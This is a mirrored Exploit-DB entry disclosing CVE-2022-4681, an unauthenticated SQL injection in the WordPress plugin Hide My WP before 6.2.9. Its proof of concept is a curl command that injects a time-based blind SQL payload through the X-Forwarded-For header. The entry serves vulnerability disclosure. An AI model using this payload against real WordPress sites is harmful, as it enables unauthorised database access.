Hide My WP < 6.2.9 - Unauthenticated SQLi

Exploit Database
95 阅读

作者： Xenofon Vassilakopoulos

日期： 2024-03-10
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/51871/

# Exploit Title: WordPress Plugin Hide My WP < 6.2.9 - Unauthenticated SQLi 
# Publication Date: 2023-01-11
# Original Researcher: Xenofon Vassilakopoulos
# Exploit Author: Xenofon Vassilakopoulos
# Submitter: Xenofon Vassilakopoulos
# Vendor Homepage: https://wpwave.com/
# Version: Hide My WP v6.2.8 and prior
# Tested on: Hide My WP v6.2.7
# Impact: Database Access
# CVE: CVE-2022-4681
# CWE: CWE-89
# CVSS Score: 8.6 (high)

## Description

The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.


## Proof of Concept

curl -k --location --request GET "http://localhost:10008" --header "X-Forwarded-For: 127.0.0.1'+(select*from(select(sleep(20)))a)+'"

last Exploits
Hide My WP < 6.2.9 - Unauthenticated SQLi的更多信息

Affiliate MLM Script 1.0 – ‘product-category.php?key’ SQL Injection：
Joomla! Component ArtForms 2.1b7.2 rc2 – Multiple Vulnerabilities：
Preisschlacht Multi Liveshop System – ‘index.php?aid’ SQL Injection：
WordPress Plugin GigPress 2.3.8 – SQL Injection：
WordPress Plugin Huge-IT Image Gallery 1.0.1 – (Authenticated) SQL Injection：
Mambo – Cache_Lite Class MosConfig_absolute_path Remote File Inclusion (Metasploit)：
Green Shop – SQL Injection：
WYSIWYG HTML Editor PRO 1.0 – Arbitrary File Download：